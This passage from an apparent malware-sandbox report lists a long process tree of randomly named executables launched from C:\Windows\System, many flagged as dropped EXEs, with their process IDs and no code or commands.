  PID:2728
- C:\Windows\System\yIrymal.exe
  C:\Windows\System\yIrymal.exe
  2⤵
  - Executes dropped EXE
  PID:2092
- C:\Windows\System\RDNvTBT.exe
  C:\Windows\System\RDNvTBT.exe
  2⤵
  - Executes dropped EXE
  PID:2172
- C:\Windows\System\zklISHA.exe
  C:\Windows\System\zklISHA.exe
  2⤵
  - Executes dropped EXE
  PID:4500
- C:\Windows\System\vSvHiJM.exe
  C:\Windows\System\vSvHiJM.exe
  2⤵
  - Executes dropped EXE
  PID:896
- C:\Windows\System\FMHoKwB.exe
  C:\Windows\System\FMHoKwB.exe
  2⤵
  - Executes dropped EXE
  PID:1180
- C:\Windows\System\glXASqc.exe
  C:\Windows\System\glXASqc.exe
  2⤵
  - Executes dropped EXE
  PID:4860
- C:\Windows\System\BAzZPMY.exe
  C:\Windows\System\BAzZPMY.exe
  2⤵
  - Executes dropped EXE
  PID:1860
- C:\Windows\System\cRsmVkn.exe
  C:\Windows\System\cRsmVkn.exe
  2⤵
  - Executes dropped EXE
  PID:4028
- C:\Windows\System\QEMatyk.exe
  C:\Windows\System\QEMatyk.exe
  2⤵
  - Executes dropped EXE
  PID:3576
- C:\Windows\System\kDSsRco.exe
  C:\Windows\System\kDSsRco.exe
  2⤵
  - Executes dropped EXE
  PID:2740
- C:\Windows\System\fymZKJy.exe
  C:\Windows\System\fymZKJy.exe
  2⤵
  - Executes dropped EXE
  PID:3688
- C:\Windows\System\SPEimhJ.exe
  C:\Windows\System\SPEimhJ.exe
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Windows\System\cRSMKSh.exe
  C:\Windows\System\cRSMKSh.exe
  2⤵
  - Executes dropped EXE
  PID:4188
- C:\Windows\System\xVDSOiP.exe
  C:\Windows\System\xVDSOiP.exe
  2⤵
  - Executes dropped EXE
  PID:4332
- C:\Windows\System\kLHVxWp.exe
  C:\Windows\System\kLHVxWp.exe
  2⤵
  - Executes dropped EXE
  PID:3728
- C:\Windows\System\UHioooD.exe
  C:\Windows\System\UHioooD.exe
  2⤵
  - Executes dropped EXE
  PID:524
- C:\Windows\System\KKVUrGS.exe
  C:\Windows\System\KKVUrGS.exe
  2⤵
  - Executes dropped EXE
  PID:8
- C:\Windows\System\lTxtKyj.exe
  C:\Windows\System\lTxtKyj.exe
  2⤵
  - Executes dropped EXE
  PID:2128
- C:\Windows\System\kBjXgVi.exe
  C:\Windows\System\kBjXgVi.exe
  2⤵
  - Executes dropped EXE
  PID:3960
- C:\Windows\System\IKNgFjX.exe
  C:\Windows\System\IKNgFjX.exe
  2⤵
  - Executes dropped EXE
  PID:4888
- C:\Windows\System\YdpVHSM.exe
  C:\Windows\System\YdpVHSM.exe
  2⤵
  - Executes dropped EXE
  PID:3408
- C:\Windows\System\xgMdxoB.exe
  C:\Windows\System\xgMdxoB.exe
  2⤵
  - Executes dropped EXE
  PID:2864
- C:\Windows\System\EybwgPo.exe
  C:\Windows\System\EybwgPo.exe
  2⤵
  - Executes dropped EXE
  PID:540
- C:\Windows\System\OnJJNNn.exe
  C:\Windows\System\OnJJNNn.exe
  2⤵
  - Executes dropped EXE
  PID:1720
- C:\Windows\System\rxjYlFD.exe
  C:\Windows\System\rxjYlFD.exe
  2⤵
  - Executes dropped EXE
  PID:768
- C:\Windows\System\GmKOnQZ.exe
  C:\Windows\System\GmKOnQZ.exe
  2⤵
  - Executes dropped EXE
  PID:4640
- C:\Windows\System\DJMNDPJ.exe
  C:\Windows\System\DJMNDPJ.exe
  2⤵
  - Executes dropped EXE
  PID:4932
- C:\Windows\System\cMsPswK.exe
  C:\Windows\System\cMsPswK.exe
  2⤵
  - Executes dropped EXE
  PID:224
- C:\Windows\System\yQuVWoE.exe
  C:\Windows\System\yQuVWoE.exe
  2⤵
  - Executes dropped EXE
  PID:2252
- C:\Windows\System\BNIJsgd.exe
  C:\Windows\System\BNIJsgd.exe
  2⤵
  - Executes dropped EXE
  PID:632
- C:\Windows\System\OtWnIRc.exe
  C:\Windows\System\OtWnIRc.exe
  2⤵
  - Executes dropped EXE
  PID:3324
- C:\Windows\System\TkWNKwI.exe
  C:\Windows\System\TkWNKwI.exe
  2⤵
  - Executes dropped EXE
  PID:1472
- C:\Windows\System\cqCvVOW.exe
  C:\Windows\System\cqCvVOW.exe
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\Windows\System\KiVCRfD.exe
  C:\Windows\System\KiVCRfD.exe
  2⤵
  - Executes dropped EXE
  PID:5064
- C:\Windows\System\osKDbcQ.exe
  C:\Windows\System\osKDbcQ.exe
  2⤵
  - Executes dropped EXE
  PID:3288
- C:\Windows\System\FbrTUfe.exe
  C:\Windows\System\FbrTUfe.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\System\upDyQWr.exe
  C:\Windows\System\upDyQWr.exe
  2⤵
  - Executes dropped EXE
  PID:3204
- C:\Windows\System\BEkRCYX.exe
  C:\Windows\System\BEkRCYX.exe
  2⤵
  - Executes dropped EXE
  PID:1436
- C:\Windows\System\vLQWjmr.exe
  C:\Windows\System\vLQWjmr.exe
  2⤵
  - Executes dropped EXE
  PID:1096
- C:\Windows\System\qIvZkTZ.exe
  C:\Windows\System\qIvZkTZ.exe
  2⤵
  - Executes dropped EXE
  PID:2244
- C:\Windows\System\ROAGrpA.exe
  C:\Windows\System\ROAGrpA.exe
  2⤵
  - Executes dropped EXE
  PID:4960
- C:\Windows\System\wXUUxTS.exe
  C:\Windows\System\wXUUxTS.exe
  2⤵
  - Executes dropped EXE
  PID:4392
- C:\Windows\System\xGJnefw.exe
  C:\Windows\System\xGJnefw.exe
  2⤵
  - Executes dropped EXE
  PID:2452
- C:\Windows\System\ZyORhET.exe
  C:\Windows\System\ZyORhET.exe
  2⤵
  PID:5072
- C:\Windows\System\lvCWDrx.exe
  C:\Windows\System\lvCWDrx.exe
  2⤵
  PID:628
- C:\Windows\System\XpFtJzC.exe
  C:\Windows\System\XpFtJzC.exe
  2⤵
  PID:916
- C:\Windows\System\zzorhFV.exe
  C:\Windows\System\zzorhFV.exe
  2⤵
  PID:4380
- C:\Windows\System\KGgEdhM.exe
  C:\Windows\System\KGgEdhM.exe
  2⤵
  PID:1320
- C:\Windows\System\IVfWvVi.exe
  C:\Windows\System\IVfWvVi.exe
  2⤵
  PID:5144
- C:\Windows\System\rJZYNhx.exe
  C:\Windows\System\rJZYNhx.exe
  2⤵
  PID:5172
- C:\Windows\System\viHagGN.exe
  C:\Windows\System\viHagGN.exe
  2⤵
  PID:5196
- C:\Windows\System\rVuocWI.exe
  C:\Windows\System\rVuocWI.exe
  2⤵
  PID:5228
- C:\Windows\System\JTcAHxu.exe
  C:\Windows\System\JTcAHxu.exe
  2⤵
  PID:5252
- C:\Windows\System\trJRMNH.exe
  C:\Windows\System\trJRMNH.exe
  2⤵
  PID:5284
- C:\Windows\System\oJXzadr.exe
  C:\Windows\System\oJXzadr.exe
  2⤵
  PID:5308
- C:\Windows\System\MWNvpqV.exe
  C:\Windows\System\MWNvpqV.exe
  2⤵
  PID:5332
- C:\Windows\System\mwhCeNT.exe
  C:\Windows\System\mwhCeNT.exe
  2⤵
  PID:5364
- C:\Windows\System\oYmFBsz.exe
  C:\Windows\System\oYmFBsz.exe
  2⤵
  PID:5396
- C:\Windows\System\FKxfHOD.exe
  C:\Windows\System\FKxfHOD.exe
  2⤵
  PID:5428
- C:\Windows\System\cMHZJIe.exe
  C:\Windows\System\cMHZJIe.exe
  2⤵
  PID:5452
- C:\Windows\System\cDIPpxJ.exe
  C:\Windows\System\cDIPpxJ.exe
  2⤵
  PID:5476
- C:\Windows\System\BiVMOpz.exe
  C:\Windows\System\BiVMOpz.exe
  2⤵
  PID:5504
- C:\Windows\System\SblRCmY.exe
  C:\Windows\System\SblRCmY.exe
  2⤵
  PID:5536
- C:\Windows\System\fXtkyYQ.exe
  C:\Windows\System\fXtkyYQ.exe
  2⤵
  PID:5564
- C:\Windows\System\LWwbFyY.exe
  C:\Windows\System\LWwbFyY.exe
  2⤵
  PID:5596
- C:\Windows\System\HVMEWjS.exe
  C:\Windows\System\HVMEWjS.exe
  2⤵
  PID:5620
- C:\Windows\System\ZxKKUIr.exe
  C:\Windows\System\ZxKKUIr.exe
  2⤵
  PID:5652
- C:\Windows\System\yalrxJz.exe
  C:\Windows\System\yalrxJz.exe
  2⤵
  PID:5672
- C:\Windows\System\RyiDaPm.exe
  C:\Windows\System\RyiDaPm.exe
  2⤵
  PID:5700
- C:\Windows\System\XZdbXIn.exe
  C:\Windows\System\XZdbXIn.exe
  2⤵
  PID:5732
- C:\Windows\System\tpZeuDS.exe
  C:\Windows\System\tpZeuDS.exe
  2⤵
  PID:5760
- C:\Windows\System\NrlHFEI.exe
  C:\Windows\System\NrlHFEI.exe
  2⤵
  PID:5784
- C:\Windows\System\AiNafaO.exe
  C:\Windows\System\AiNafaO.exe
  2⤵
  PID:5816
- C:\Windows\System\OCzxtfb.exe
  C:\Windows\System\OCzxtfb.exe
  2⤵
  PID:5892
- C:\Windows\System\qTfsypg.exe
  C:\Windows\System\qTfsypg.exe
  2⤵
  PID:5912
- C:\Windows\System\zZfOPxr.exe
  C:\Windows\System\zZfOPxr.exe
  2⤵
  PID:5952
- C:\Windows\System\tHvFxcb.exe
  C:\Windows\System\tHvFxcb.exe
  2⤵
  PID:5972
- C:\Windows\System\duOnEsF.exe
  C:\Windows\System\duOnEsF.exe
  2⤵
  PID:5996
- C:\Windows\System\gSzPlGf.exe
  C:\Windows\System\gSzPlGf.exe
  2⤵
  PID:6012
- C:\Windows\System\mhwzphY.exe
  C:\Windows\System\mhwzphY.exe
  2⤵
  PID:6044
- C:\Windows\System\NPHFBjn.exe
  C:\Windows\System\NPHFBjn.exe
  2⤵
  PID:6096
- C:\Windows\System\mojkBaR.exe
  C:\Windows\System\mojkBaR.exe
  2⤵
  PID:6112
- C:\Windows\System\kLFouZY.exe
  C:\Windows\System\kLFouZY.exe
  2⤵
  PID:6140
- C:\Windows\System\dBeCcUF.exe
  C:\Windows\System\dBeCcUF.exe
  2⤵
  PID:4272
- C:\Windows\System\rNbQrNs.exe
  C:\Windows\System\rNbQrNs.exe
  2⤵
  PID:408
- C:\Windows\System\YicpelX.exe
  C:\Windows\System\YicpelX.exe
  2⤵
  PID:5124
- C:\Windows\System\uaAvakw.exe
  C:\Windows\System\uaAvakw.exe
  2⤵
  PID:5236
- C:\Windows\System\JmIRAUP.exe
  C:\Windows\System\JmIRAUP.exe
  2⤵
  PID:5292
- C:\Windows\System\CvCpvbz.exe
  C:\Windows\System\CvCpvbz.exe
  2⤵
  PID:5352
- C:\Windows\System\SvxfgXV.exe
  C:\Windows\System\SvxfgXV.exe
  2⤵
  PID:5404
- C:\Windows\System\saqGRRh.exe
  C:\Windows\System\saqGRRh.exe
  2⤵
  PID:5468
- C:\Windows\System\BBWuaPH.exe
  C:\Windows\System\BBWuaPH.exe
  2⤵
  PID:5516
- C:\Windows\System\kZavqcO.exe
  C:\Windows\System\kZavqcO.exe
  2⤵
  PID:5608
- C:\Windows\System\XfMGhtx.exe
  C:\Windows\System\XfMGhtx.exe
  2⤵
  PID:5648
- C:\Windows\System\UXUOCag.exe
  C:\Windows\System\UXUOCag.exe
  2⤵
  PID:5716
- C:\Windows\System\McXUXhg.exe
  C:\Windows\System\McXUXhg.exe
  2⤵
  PID:5768
- C:\Windows\System\LYDrvib.exe
  C:\Windows\System\LYDrvib.exe
  2⤵
  PID:4388
- C:\Windows\System\IEHhZHl.exe
  C:\Windows\System\IEHhZHl.exe
  2⤵
  PID:4796
- C:\Windows\System\dtcVdpC.exe
  C:\Windows\System\dtcVdpC.exe
  2⤵
  PID:1892
- C:\Windows\System\wjxUIYx.exe
  C:\Windows\System\wjxUIYx.exe
  2⤵
  PID:2376
- C:\Windows\System\KktnKzA.exe
  C:\Windows\System\KktnKzA.exe
  2⤵
  PID:3672
- C:\Windows\System\ZyVKlQW.exe
  C:\Windows\System\ZyVKlQW.exe
  2⤵
  PID:3256
- C:\Windows\System\CkdUSvA.exe
  C:\Windows\System\CkdUSvA.exe
  2⤵
  PID:1716
- C:\Windows\System\RFVqUYp.exe
  C:\Windows\System\RFVqUYp.exe
  2⤵
  PID:4352
- C:\Windows\System\ttkSaDt.exe
  C:\Windows\System\ttkSaDt.exe
  2⤵
  PID:548
- C:\Windows\System\jlRQvRG.exe
  C:\Windows\System\jlRQvRG.exe
  2⤵
  PID:4872
- C:\Windows\System\mlOlcpD.exe
  C:\Windows\System\mlOlcpD.exe
  2⤵
  PID:2108
- C:\Windows\System\ESltNQV.exe
  C:\Windows\System\ESltNQV.exe
  2⤵
  PID:3148
- C:\Windows\System\FZojeqo.exe
  C:\Windows\System\FZojeqo.exe
  2⤵
  PID:4564
- C:\Windows\System\yiFOzRG.exe
  C:\Windows\System\yiFOzRG.exe
  2⤵
  PID:4736
- C:\Windows\System\NohgwhI.exe
  C:\Windows\System\NohgwhI.exe
  2⤵
  PID:4164
- C:\Windows\System\lSlVskB.exe
  C:\Windows\System\lSlVskB.exe
  2⤵
  PID:5936
- C:\Windows\System\lclGovc.exe
  C:\Windows\System\lclGovc.exe
  2⤵
  PID:5968
- C:\Windows\System\kLZIwvi.exe
  C:\Windows\System\kLZIwvi.exe
  2⤵
  PID:2160
- C:\Windows\System\yczwtaI.exe
  C:\Windows\System\yczwtaI.exe
  2⤵
  PID:6036
- C:\Windows\System\gdpmLZZ.exe
  C:\Windows\System\gdpmLZZ.exe
  2⤵
  PID:6108
- C:\Windows\System\MxpdlGq.exe
  C:\Windows\System\MxpdlGq.exe
  2⤵
  PID:3640
- C:\Windows\System\QbtPmRe.exe
  C:\Windows\System\QbtPmRe.exe
  2⤵
  PID:2956
- C:\Windows\System\WWmflvG.exe
  C:\Windows\System\WWmflvG.exe
  2⤵
  PID:5188
- C:\Windows\System\WkRKAKL.exe
  C:\Windows\System\WkRKAKL.exe
  2⤵
  PID:5180
- C:\Windows\System\FfzYJYv.exe
  C:\Windows\System\FfzYJYv.exe
  2⤵
  PID:5264
- C:\Windows\System\lkUpRvs.exe
  C:\Windows\System\lkUpRvs.exe
  2⤵
  PID:5440
- C:\Windows\System\ztPSTGf.exe
  C:\Windows\System\ztPSTGf.exe
  2⤵
  PID:5544
- C:\Windows\System\GQdTpvo.exe
  C:\Windows\System\GQdTpvo.exe
  2⤵
  PID:2540
- C:\Windows\System\xcqhIqB.exe
  C:\Windows\System\xcqhIqB.exe
  2⤵
  PID:2636
- C:\Windows\System\qPnVzPZ.exe
  C:\Windows\System\qPnVzPZ.exe
  2⤵
  PID:4160
- C:\Windows\System\qXjGTGt.exe
  C:\Windows\System\qXjGTGt.exe
  2⤵
  PID:2408
- C:\Windows\System\NNYVJXo.exe
  C:\Windows\System\NNYVJXo.exe
  2⤵
  PID:2756
- C:\Windows\System\cqWGDeu.exe
  C:\Windows\System\cqWGDeu.exe
  2⤵
  PID:3244
- C:\Windows\System\RExrLdv.exe
  C:\Windows\System\RExrLdv.exe
  2⤵
  PID:724
- C:\Windows\System\sGtxSKL.exe
  C:\Windows\System\sGtxSKL.exe
  2⤵
  PID:1232
- C:\Windows\System\QvFBZcp.exe
  C:\Windows\System\QvFBZcp.exe
  2⤵
  PID:4280
- C:\Windows\System\RPzjyPw.exe
  C:\Windows\System\RPzjyPw.exe
  2⤵
  PID:6080
- C:\Windows\System\LRxyAKC.exe
  C:\Windows\System\LRxyAKC.exe
  2⤵
  PID:6004
- C:\Windows\System\QwgFbJK.exe
  C:\Windows\System\QwgFbJK.exe
  2⤵
  PID:6064
- C:\Windows\System\nPBYNiX.exe
  C:\Windows\System\nPBYNiX.exe
  2⤵
  PID:5668
- C:\Windows\System\AqvMoxW.exe
  C:\Windows\System\AqvMoxW.exe
  2⤵
  PID:5160
- C:\Windows\System\LnVBmRQ.exe
  C:\Windows\System\LnVBmRQ.exe
  2⤵
  PID:5380
- C:\Windows\System\TEDMVNs.exe
  C:\Windows\System\TEDMVNs.exe
  2⤵
  PID:2096
- C:\Windows\System\TfuxKQG.exe
  C:\Windows\System\TfuxKQG.exe
  2⤵
  PID:4340
- C:\Windows\System\gxHijYV.exe
  C:\Windows\System\gxHijYV.exe
  2⤵
  PID:5804
- C:\Windows\System\OjvNair.exe
  C:\Windows\System\OjvNair.exe
  2⤵
  PID:6132
- C:\Windows\System\gigLyVo.exe
  C:\Windows\System\gigLyVo.exe
  2⤵
  PID:960
- C:\Windows\System\GjwCOKd.exe
  C:\Windows\System\GjwCOKd.exe
  2⤵
  PID:6164
- C:\Windows\System\URGxNkT.exe
  C:\Windows\System\URGxNkT.exe
  2⤵
  PID:6184
- C:\Windows\System\rvRYKhh.exe
  C:\Windows\System\rvRYKhh.exe
  2⤵
  PID:6200
- C:\Windows\System\yphiuGC.exe
  C:\Windows\System\yphiuGC.exe
  2⤵
  PID:6224
- C:\Windows\System\ndvVMxh.exe
  C:\Windows\System\ndvVMxh.exe
  2⤵
  PID:6240
- C:\Windows\System\LcfrfJN.exe
  C:\Windows\System\LcfrfJN.exe
  2⤵
  PID:6276
- C:\Windows\System\fvHwqoO.exe
  C:\Windows\System\fvHwqoO.exe
  2⤵
  PID:6340
- C:\Windows\System\cIRXOnb.exe
  C:\Windows\System\cIRXOnb.exe
  2⤵
  PID:6388
- C:\Windows\System\evdofpH.exe
  C:\Windows\System\evdofpH.exe
  2⤵
  PID:6404
- C:\Windows\System\xKWpvwa.exe
  C:\Windows\System\xKWpvwa.exe
  2⤵
  PID:6428
- C:\Windows\System\FecXsCc.exe
  C:\Windows\System\FecXsCc.exe
  2⤵
  PID:6444
- C:\Windows\System\CnPjSgl.exe
  C:\Windows\System\CnPjSgl.exe
  2⤵
  PID:6464
- C:\Windows\System\xcVTqSS.exe
  C:\Windows\System\xcVTqSS.exe
  2⤵
  PID:6484
- C:\Windows\System\HqulJZo.exe
  C:\Windows\System\HqulJZo.exe
  2⤵
  PID:6536
- C:\Windows\System\nsiGKXi.exe
  C:\Windows\System\nsiGKXi.exe
  2⤵
  PID:6556
- C:\Windows\System\JBmOamq.exe
  C:\Windows\System\JBmOamq.exe
  2⤵
  PID:6648
- C:\Windows\System\rMevYjY.exe
  C:\Windows\System\rMevYjY.exe
  2⤵
  PID:6668
- C:\Windows\System\myVJTyu.exe
  C:\Windows\System\myVJTyu.exe
  2⤵
  PID:6684
- C:\Windows\System\iUeteee.exe
  C:\Windows\System\iUeteee.exe
  2⤵
  PID:6708
- C:\Windows\System\rRIQvHI.exe
  C:\Windows\System\rRIQvHI.exe
  2⤵
  PID:6724
- C:\Windows\System\KRWDpZG.exe
  C:\Windows\System\KRWDpZG.exe
  2⤵
  PID:6748
- C:\Windows\System\jjmBISe.exe
  C:\Windows\System\jjmBISe.exe
  2⤵
  PID:6804
- C:\Windows\System\yjtLfRy.exe
  C:\Windows\System\yjtLfRy.exe
  2⤵
  PID:6844
- C:\Windows\System\dHKwkOf.exe
  C:\Windows\System\dHKwkOf.exe
  2⤵
  PID:6884
- C:\Windows\System\baKzLCq.exe
  C:\Windows\System\baKzLCq.exe
  2⤵
  PID:6900
- C:\Windows\System\FqQhfLV.exe
  C:\Windows\System\FqQhfLV.exe
  2⤵
  PID:6964
- C:\Windows\System\aknaHXE.exe
  C:\Windows\System\aknaHXE.exe
  2⤵
  PID:6984
- C:\Windows\System\PHeWhRz.exe
  C:\Windows\System\PHeWhRz.exe
  2⤵
  PID:7004
- C:\Windows\System\WPtWjTC.exe
  C:\Windows\System\WPtWjTC.exe
  2⤵
  PID:7028
- C:\Windows\System\rnlwMeR.exe
  C:\Windows\System\rnlwMeR.exe
  2⤵
  PID:7048
- C:\Windows\System\euTQhoH.exe
  C:\Windows\System\euTQhoH.exe
  2⤵
  PID:7068
- C:\Windows\System\nvmTcbS.exe
  C:\Windows\System\nvmTcbS.exe
  2⤵
  PID:7088
- C:\Windows\System\Nupjbon.exe
  C:\Windows\System\Nupjbon.exe
  2⤵
  PID:7112
- C:\Windows\System\OhYtGTQ.exe
  C:\Windows\System\OhYtGTQ.exe
  2⤵
  PID:5496
- C:\Windows\System\YCiuBUF.exe
  C:\Windows\System\YCiuBUF.exe
  2⤵
  PID:4816
- C:\Windows\System\vBZRGsd.exe
  C:\Windows\System\vBZRGsd.exe
  2⤵
  PID:5112
- C:\Windows\System\JmpLMgt.exe
  C:\Windows\System\JmpLMgt.exe
  2⤵
  PID:1360
- C:\Windows\System\JisDKFH.exe
  C:\Windows\System\JisDKFH.exe
  2⤵
  PID:6160
- C:\Windows\System\dtnwFix.exe
  C:\Windows\System\dtnwFix.exe
  2⤵
  PID:6192
- C:\Windows\System\oANUJwY.exe
  C:\Windows\System\oANUJwY.exe
  2⤵
  PID:6232
- C:\Windows\System\mNUXakO.exe
  C:\Windows\System\mNUXakO.exe
  2⤵
  PID:6440
- C:\Windows\System\IyFgFGB.exe
  C:\Windows\System\IyFgFGB.exe
  2⤵
  PID:6296
- C:\Windows\System\ONbonlo.exe
  C:\Windows\System\ONbonlo.exe
  2⤵
  PID:6348
- C:\Windows\System\KLDtiUY.exe
  C:\Windows\System\KLDtiUY.exe
  2⤵
  PID:6768
- C:\Windows\System\JJcHblV.exe
  C:\Windows\System\JJcHblV.exe
  2⤵
  PID:6776
- C:\Windows\System\nIGPofJ.exe
  C:\Windows\System\nIGPofJ.exe
  2⤵
  PID:6744
- C:\Windows\System\dkzhsBo.exe
  C:\Windows\System\dkzhsBo.exe
  2⤵
  PID:6864
- C:\Windows\System\yMeCahM.exe
  C:\Windows\System\yMeCahM.exe
  2⤵
  PID:6928
- C:\Windows\System\VubLrMY.exe
  C:\Windows\System\VubLrMY.exe
  2⤵
  PID:7064
- C:\Windows\System\lgELxpb.exe
  C:\Windows\System\lgELxpb.exe
  2⤵
  PID:7000
- C:\Windows\System\yNaBCCH.exe
  C:\Windows\System\yNaBCCH.exe
  2⤵
  PID:7104
- C:\Windows\System\xOOTzNE.exe
  C:\Windows\System\xOOTzNE.exe
  2⤵
  PID:5268
- C:\Windows\System\yRBJvqJ.exe
  C:\Windows\System\yRBJvqJ.exe
  2⤵
  PID:7152
- C:\Windows\System\QwDyJUv.exe
  C:\Windows\System\QwDyJUv.exe
  2⤵
  PID:6180
- C:\Windows\System\xzUOMhn.exe
  C:\Windows\System\xzUOMhn.exe
  2⤵
  PID:3748
- C:\Windows\System\jznOtKA.exe
  C:\Windows\System\jznOtKA.exe
  2⤵
  PID:6424
- C:\Windows\System\HvwpswG.exe
  C:\Windows\System\HvwpswG.exe
  2⤵
  PID:6576
- C:\Windows\System\XDmglTV.exe
  C:\Windows\System\XDmglTV.exe
  2⤵
  PID:6816
- C:\Windows\System\EIcyIub.exe
  C:\Windows\System\EIcyIub.exe
  2⤵
  PID:6980
- C:\Windows\System\GfSvhzY.exe
  C:\Windows\System\GfSvhzY.exe
  2⤵
  PID:7144
- C:\Windows\System\EnqZfjZ.exe
  C:\Windows\System\EnqZfjZ.exe
  2⤵
  PID:6312
- C:\Windows\System\ZKZLqdg.exe
  C:\Windows\System\ZKZLqdg.exe
  2⤵
  PID:6856
- C:\Windows\System\pbCvcSW.exe
  C:\Windows\System\pbCvcSW.exe
  2⤵
  PID:6020
- C:\Windows\System\cPWlhvz.exe
  C:\Windows\System\cPWlhvz.exe
  2⤵
  PID:6896
- C:\Windows\System\XNruyxu.exe
  C:\Windows\System\XNruyxu.exe
  2⤵
  PID:7192
- C:\Windows\System\nIxaqEp.exe
  C:\Windows\System\nIxaqEp.exe
  2⤵
  PID:7212
- C:\Windows\System\DfYzEsU.exe
  C:\Windows\System\DfYzEsU.exe
  2⤵
  PID:7232
- C:\Windows\System\OdkvvsF.exe
  C:\Windows\System\OdkvvsF.exe
  2⤵
  PID:7252
- C:\Windows\System\oPOnJVZ.exe
  C:\Windows\System\oPOnJVZ.exe
  2⤵
  PID:7268
- C:\Windows\System\YmpnHOS.exe
  C:\Windows\System\YmpnHOS.exe
  2⤵
  PID:7308
- C:\Windows\System\hwZXevt.exe
  C:\Windows\System\hwZXevt.exe
  2⤵
  PID:7336
- C:\Windows\System\mrKyLaw.exe
  C:\Windows\System\mrKyLaw.exe
  2⤵
  PID:7364
- C:\Windows\System\RweFxHU.exe
  C:\Windows\System\RweFxHU.exe
  2⤵
  PID:7396
- C:\Windows\System\HLTqoMg.exe
  C:\Windows\System\HLTqoMg.exe
  2⤵
  PID:7432
- C:\Windows\System\QyzJVfd.exe
  C:\Windows\System\QyzJVfd.exe
  2⤵
  PID:7464
- C:\Windows\System\ayKRXsW.exe
  C:\Windows\System\ayKRXsW.exe
  2⤵
  PID:7480
- C:\Windows\System\ZcIqTXh.exe
  C:\Windows\System\ZcIqTXh.exe
  2⤵
  PID:7504
- C:\Windows\System\YqHPIkf.exe
  C:\Windows\System\YqHPIkf.exe
  2⤵
  PID:7540
- C:\Windows\System\cMQbXWn.exe
  C:\Windows\System\cMQbXWn.exe
  2⤵
  PID:7576
- C:\Windows\System\rUZhQpX.exe
  C:\Windows\System\rUZhQpX.exe
  2⤵
  PID:7600
- C:\Windows\System\rfDDsCB.exe
  C:\Windows\System\rfDDsCB.exe
  2⤵
  PID:7624
- C:\Windows\System\larhFsk.exe
  C:\Windows\System\larhFsk.exe
  2⤵
  PID:7648
- C:\Windows\System\zFRbyAd.exe
  C:\Windows\System\zFRbyAd.exe
  2⤵
  PID:7668
- C:\Windows\System\TRLnYrP.exe
  C:\Windows\System\TRLnYrP.exe
  2⤵
  PID:7692
- C:\Windows\System\IzFIAIy.exe
  C:\Windows\System\IzFIAIy.exe
  2⤵
  PID:7712
- C:\Windows\System\yRGyRRp.exe
  C:\Windows\System\yRGyRRp.exe
  2⤵
  PID:7740
- C:\Windows\System\RfzhiPH.exe
  C:\Windows\System\RfzhiPH.exe
  2⤵
  PID:7756
- C:\Windows\System\gLInHQN.exe
  C:\Windows\System\gLInHQN.exe
  2⤵
  PID:7816
- C:\Windows\System\ChSUKRf.exe
  C:\Windows\System\ChSUKRf.exe
  2⤵
  PID:7836
- C:\Windows\System\EzBSGTL.exe
  C:\Windows\System\EzBSGTL.exe
  2⤵
  PID:7896
- C:\Windows\System\xMqPoDp.exe
  C:\Windows\System\xMqPoDp.exe
  2⤵
  PID:7916
- C:\Windows\System\rIIPfBf.exe
  C:\Windows\System\rIIPfBf.exe
  2⤵
  PID:7936
- C:\Windows\System\stBWKxK.exe
  C:\Windows\System\stBWKxK.exe
  2⤵
  PID:7980
- C:\Windows\System\PAUleMS.exe
  C:\Windows\System\PAUleMS.exe
  2⤵
  PID:8000
- C:\Windows\System\UxwlKsk.exe
  C:\Windows\System\UxwlKsk.exe
  2⤵
  PID:8024
- C:\Windows\System\ETwJeJC.exe
  C:\Windows\System\ETwJeJC.exe
  2⤵
  PID:8040
- C:\Windows\System\LwrAVSF.exe
  C:\Windows\System\LwrAVSF.exe
  2⤵
  PID:8064
- C:\Windows\System\zbsxSOw.exe
  C:\Windows\System\zbsxSOw.exe
  2⤵
  PID:8124
- C:\Windows\System\YuQKckH.exe
  C:\Windows\System\YuQKckH.exe
  2⤵
  PID:8140
- C:\Windows\System\dNZvmjW.exe
  C:\Windows\System\dNZvmjW.exe
  2⤵
  PID:8168
- C:\Windows\System\eENZmVs.exe
  C:\Windows\System\eENZmVs.exe
  2⤵
  PID:8188
- C:\Windows\System\IeucItJ.exe
  C:\Windows\System\IeucItJ.exe
  2⤵
  PID:7220
- C:\Windows\System\XbAuXQU.exe
  C:\Windows\System\XbAuXQU.exe
  2⤵
  PID:7288
- C:\Windows\System\SfFoYpt.exe
  C:\Windows\System\SfFoYpt.exe
  2⤵
  PID:7332
- C:\Windows\System\DZCXMiS.exe
  C:\Windows\System\DZCXMiS.exe
  2⤵
  PID:7356
- C:\Windows\System\yrsbXAm.exe
  C:\Windows\System\yrsbXAm.exe
  2⤵
  PID:7440
- C:\Windows\System\vrjFLKv.exe
  C:\Windows\System\vrjFLKv.exe
  2⤵
  PID:7476
- C:\Windows\System\nMBRNad.exe
  C:\Windows\System\nMBRNad.exe
  2⤵
  PID:7524
- C:\Windows\System\fYEVrSJ.exe
  C:\Windows\System\fYEVrSJ.exe
  2⤵
  PID:7616
- C:\Windows\System\bQZpriy.exe
  C:\Windows\System\bQZpriy.exe
  2⤵
  PID:7584
- C:\Windows\System\NYJKMVL.exe
  C:\Windows\System\NYJKMVL.exe
  2⤵
  PID:7632
- C:\Windows\System\xidQuAq.exe
  C:\Windows\System\xidQuAq.exe
  2⤵
  PID:7720
- C:\Windows\System\KDEciOa.exe
  C:\Windows\System\KDEciOa.exe
  2⤵
  PID:7804
- C:\Windows\System\CWbKunG.exe
  C:\Windows\System\CWbKunG.exe
  2⤵
  PID:7872
- C:\Windows\System\PKssCCa.exe
  C:\Windows\System\PKssCCa.exe
  2⤵
  PID:8084
- C:\Windows\System\gpCucxF.exe
  C:\Windows\System\gpCucxF.exe
  2⤵
  PID:8132
- C:\Windows\System\sMqbbTQ.exe
  C:\Windows\System\sMqbbTQ.exe
  2⤵
  PID:7204
- C:\Windows\System\AoiRsSy.exe
  C:\Windows\System\AoiRsSy.exe
  2⤵
  PID:7228
- C:\Windows\System\xxGRoiz.exe
  C:\Windows\System\xxGRoiz.exe
  2⤵
  PID:7420
- C:\Windows\System\xfvdRel.exe
  C:\Windows\System\xfvdRel.exe
  2⤵
  PID:7572
- C:\Windows\System\RPFSrMx.exe
  C:\Windows\System\RPFSrMx.exe
  2⤵
  PID:7848
- C:\Windows\System\aNhiRAf.exe
  C:\Windows\System\aNhiRAf.exe
  2⤵
  PID:7928
- C:\Windows\System\NzTNMKC.exe
  C:\Windows\System\NzTNMKC.exe
  2⤵
  PID:7956
- C:\Windows\System\qWDLrGY.exe
